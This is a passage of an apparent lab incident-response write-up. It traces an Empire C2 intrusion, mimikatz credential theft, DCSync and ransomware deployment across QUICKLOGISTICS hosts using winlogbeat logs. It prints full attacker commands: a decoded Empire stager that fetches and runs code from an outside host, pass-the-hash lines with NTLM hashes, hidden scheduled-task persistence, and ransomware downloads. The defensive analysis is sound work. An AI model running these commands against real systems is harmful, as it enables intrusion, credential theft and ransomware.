$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort            

  2023-08-30T00:20:59.159Z  allan.smith	4892	752	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T00:20:59.718Z  allan.smith	5076	4892	"C:\Windows\system32\whoami.exe"
  2023-08-30T00:21:53.053Z  allan.smith	6788	752	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T00:21:53.284Z  allan.smith	6708	6788	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <base64 omitted>
  [..omitted..]

allan.smith appears to be a local administrator on the workstation, and the attacker leveraged this by dumping credentials with a freshly downloaded mimikatz.exe, this time obtaining the NTLM hash of the domain administrator account, Administrator:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6708

  [..omitted..]
  2023-08-30T00:22:15.913Z  allan.smith	5128	6708	"C:\Windows\system32\cmd.exe" /c hostname
  2023-08-30T00:22:22.315Z  allan.smith	5096	6708	"C:\Windows\system32\cmd.exe" /c "whoami /all"
  2023-08-30T01:28:22.638Z  allan.smith	6612	6708	"C:\Windows\system32\more.com"
  2023-08-30T01:29:09.409Z  allan.smith	1812	6708	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
  2023-08-30T01:29:39.620Z  allan.smith	6528	6708	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
  2023-08-30T01:30:25.545Z  allan.smith	2056	6708	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
  2023-08-30T01:30:51.647Z  allan.smith	6736	6708	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
  2023-08-30T01:31:39.366Z  allan.smith	6236	6708	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:QUICKLOGISTICS /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
  [..omitted..]

The Empire stager was run again; the attacker then used Invoke-Command once more to execute commands remotely on DC01, and established persistence on WKSTN-1327 via schtasks.exe (a task named Updater running as SYSTEM on idle, with its payload read from the registry):

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 2780                 

  2023-08-30T01:40:38.541Z  allan.smith	2780	752	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:40:38.808Z  allan.smith	6320	2780	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <base64 omitted>
  
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6320

  2023-08-30T01:40:38.808Z  allan.smith	6320	2780	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <base64 omitted>
  2023-08-30T01:41:34.991Z  allan.smith	5756	6320	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
  2023-08-30T01:42:47.600Z  allan.smith	4276	6320	"C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC ONIDLE /I 2 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""
  2023-08-30T01:43:36.715Z  allan.smith	4464	6320	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"
  2023-08-30T01:43:45.614Z  allan.smith	3100	6320	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname}"
  2023-08-30T01:43:57.673Z  allan.smith	5096	6320	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
  2023-08-30T01:45:12.695Z  allan.smith	5156	6320	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"

III. DC01

Confirming the remote executions on DC01 via Invoke-Command, everything went through, including an Empire stager:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01

  2023-08-29T23:50:11.566Z  Administrator@DC01	2656	5944	"C:\Windows\system32\sc.exe" start winlogbeat
  2023-08-30T01:45:02.538Z  Administrator@DC01	6644	1000	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:45:03.836Z  Administrator@DC01	2556	6644	"C:\Windows\system32\HOSTNAME.EXE"
  2023-08-30T01:45:19.418Z  Administrator@DC01	7152	1000	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:45:19.629Z  Administrator@DC01	6212	7152	"C:\Windows\system32\HOSTNAME.EXE"
  2023-08-30T01:45:41.086Z  Administrator@DC01	5292	1000	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:45:41.297Z  Administrator@DC01	4008	5292	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
  
$ echo "<-enc payload from the event above>" | base64 -d  

  If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX                                                                                                                                                                                                                                            

$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d

  http://cdn.bananapeelparty.net:80
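
The decoded stager is the stock Empire HTTP stager: it fetches $ser+$t with a fixed User-Agent and session cookie, strips a 4-byte IV from the front of the response, and feeds the rest through the $R scriptblock, which is plain RC4 keyed with IV || staging key, before piping the result into IEX. As an added example for this page (not the room's material and not Empire's own code), the following Python does the same extraction statically and ports $R byte for byte, so that a captured /admin/get.php response can be decrypted offline once the stager has been recovered from the event log. The STAGER constant is the decoded one-liner above; the stage body built in the usage section is constructed for the round-trip, not captured traffic.

```python
"""Static triage of the Empire PowerShell stager quoted above: recover the
staging server, URI, RC4 staging key and cookie from the decoded one-liner,
and reproduce the $R scriptblock (RC4) so a captured stage can be decrypted
offline.  STAGER is the decoded script from the write-up; the functions are
example code written for this page."""
import base64
import re

STAGER = (
    "If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;"
    "$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));"
    "$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;"
    "$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;"
    "$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');"
    "$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};"
    "$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};"
    '$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");'
    "$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];"
    "-join[Char[]](& $R $data ($IV+$K))|IEX"
)


def decode_enc(blob: str) -> str:
    """powershell -enc carries base64 of UTF-16LE text; `base64 -d` alone
    prints it with interleaved NULs, so decode the text encoding as well."""
    return base64.b64decode(blob).decode("utf-16-le")


def extract_config(script: str) -> dict:
    """Pull the staging parameters out of a decoded stager by pattern."""
    def grab(pattern: str) -> str:
        return re.search(pattern, script).group(1)

    return {
        "server": decode_enc(grab(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")),
        "uri": grab(r"\$t='([^']+)'"),
        "user_agent": grab(r"\$u='([^']+)'"),
        "staging_key": grab(r"ASCII\.GetBytes\('([^']+)'\)").encode("ascii"),
        "cookie": grab(r'Headers\.Add\("Cookie","([^"]+)"\)'),
    }


def rc4(key: bytes, data: bytes) -> bytes:
    """Port of the $R scriptblock: textbook RC4 key schedule and keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA: 0..255|%{$J=...; swap}
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for b in data:                            # PRGA: $D|%{...; $_ -bxor ...}
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def decrypt_stage(body: bytes, staging_key: bytes) -> bytes:
    """Server response layout: 4-byte IV || RC4(IV || staging_key, stage)."""
    return rc4(body[:4] + staging_key, body[4:])


def encrypt_stage(stage: bytes, staging_key: bytes, iv: bytes) -> bytes:
    """Inverse of decrypt_stage; used here only to build a constructed body."""
    if len(iv) != 4:
        raise ValueError("Empire prepends exactly 4 IV bytes")
    return iv + rc4(iv + staging_key, stage)


if __name__ == "__main__":
    cfg = extract_config(STAGER)
    for name, value in cfg.items():
        print(f"{name:12} {value!r}")
    # Constructed stage body (not captured traffic) to show the offline path:
    # with a real PCAP, `body` is the HTTP response from $ser+$t.
    body = encrypt_stage(b"Write-Host 'stage 2'", cfg["staging_key"], b"\x01\x02\x03\x04")
    print(decrypt_stage(body, cfg["staging_key"]).decode())
```

The extracted server, URI, User-Agent and cookie are the network indicators to block and to search proxy logs for; the staging key is what makes a proxy capture of the second stage readable, and it also explains why the stager is worth recovering verbatim from the 4688/Sysmon command line rather than just noting "encoded PowerShell".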

On DC01 the attacker fetched mimikatz from GitHub, unpacked it, enumerated the local Administrators group, and then performed a DCSync attack via mimikatz.exe against another Domain Administrator, backupda, followed by the built-in administrator account:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008

  2023-08-30T01:46:18.577Z  Administrator@DC01	5936	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
  2023-08-30T01:46:32.376Z  Administrator@DC01	4164	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
  2023-08-30T01:47:34.171Z  Administrator@DC01	4980	4008	"C:\Windows\system32\net.exe" localgroup administrators
  2023-08-30T01:47:57.809Z  Administrator@DC01	6800	4008	"C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:backupda" exit
  2023-08-30T01:48:04.117Z  Administrator@DC01	2560	4008	"C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:administrator" exit

From WKSTN-0051, a callback to the Empire C2 was then re-established using the Domain Administrator account on both WKSTN-0051 and WKSTN-1327, by pushing the encoded stager through Invoke-Command:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep WKSTN-0051

  2023-08-30T02:06:09.872Z  Administrator@WKSTN-0051	8324	5004	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {powershell -enc <base64 payload elided>}"
  2023-08-30T02:06:25.390Z  Administrator@WKSTN-0051	2340	5004	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {powershell -enc <base64 payload elided>}"

IV. Ransomware

With full control of the QUICKLOGISTICS.ORG domain, the attacker downloaded and executed a suspicious file, ransomboogey.exe, on DC01 and then pushed it to WKSTN-1327 over PowerShell remoting. The binary was also downloaded to WKSTN-0051 (into the itadmin and evan.hutchinson profiles), but there were no signs of execution there:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008

  [..omitted..]
  2023-08-30T01:53:13.738Z  Administrator@DC01	4308	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe"
  2023-08-30T01:53:33.815Z  Administrator@DC01	5572	4008	"C:\Users\Administrator\ransomboogey.exe"
  2023-08-30T01:54:11.095Z  Administrator@DC01	4404	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {hostname}"
  2023-08-30T01:54:24.982Z  Administrator@DC01	6808	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
  2023-08-30T01:56:05.018Z  Administrator@DC01	4296	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe; .\ransomboogey.exe}"
  2023-08-30T01:56:40.186Z  Administrator@DC01	6436	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe; C:\Users\itadmin\ransomboogey.exe}"
  2023-08-30T01:57:53.649Z  Administrator@DC01	5984	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {C:\Users\itadmin\ransomboogey.exe}"
  2023-08-30T01:59:36.244Z  Administrator@DC01	5148	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe;}"
  2023-08-30T02:00:58.090Z  Administrator@DC01	3672	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
  2023-08-30T02:01:14.244Z  Administrator@DC01	4384	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\evan.hutchinson\ransomboogey.exe;}"
  [..omitted..]

Pivoting on PID 7300 (Explorer.EXE running as itadmin) also shows an interactive execution of ransomboogey.exe on WKSTN-1327: the copy dropped into C:\Users\itadmin was launched from the Explorer shell, separate from the remote executions above:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7300        

  [..omitted..]
  2023-08-30T02:04:59.635Z  itadmin@WKSTN-1327	7300	7264	C:\Windows\Explorer.EXE
  [..omitted..]
  2023-08-30T02:07:22.741Z  itadmin@WKSTN-1327	8804	7300	"C:\Users\itadmin\ransomboogey.exe" 
  [..omitted..]

TIMELINE OF EVENTS

Timestamps are UTC, as recorded in the winlogbeat @timestamp field.

TIMESTAMP            EVENT
2023-08-29 23:51:15  Execution of the malicious HTA file.
2023-08-29 23:51:16  Established persistence on WKSTN-0051 via Scheduled Task.
2023-08-29 23:54:50  WKSTN-0051 calls back to the Empire C2 server.
2023-08-30 00:09:57  Download of mimikatz.exe on WKSTN-0051.
2023-08-30 00:11:26  First seen execution of mimikatz.exe on WKSTN-0051.
2023-08-30 00:19:52  Credentials of allan.smith found in IT_Automation.ps1.
2023-08-30 00:21:52  Execution of Empire stager on WKSTN-1327 from WKSTN-0051.
2023-08-30 01:29:09  Download of mimikatz.exe on WKSTN-1327.
2023-08-30 01:30:25  First seen execution of mimikatz.exe on WKSTN-1327.
2023-08-30 01:31:39  Pass-the-Hash using the Domain Administrator on WKSTN-1327.
2023-08-30 01:45:41  Execution of Empire stager on DC01 from WKSTN-0051.
2023-08-30 01:46:18  Download of mimikatz.exe on DC01.
2023-08-30 01:47:57  DCSync attack on the Domain Administrator user, backupda.
2023-08-30 01:53:13  Download of ransomboogey.exe on DC01.
2023-08-30 01:53:33  Execution of ransomboogey.exe on DC01 by Administrator.
2023-08-30 01:56:40  Last download of ransomboogey.exe on WKSTN-1327.
2023-08-30 01:59:36  First download of ransomboogey.exe on WKSTN-0051.
2023-08-30 02:06:09  Empire stager execution as DA on WKSTN-0051.
2023-08-30 02:06:25  Empire stager execution as DA on WKSTN-1327.
2023-08-30 02:07:22  Execution of ransomboogey.exe on WKSTN-1327 by itadmin.
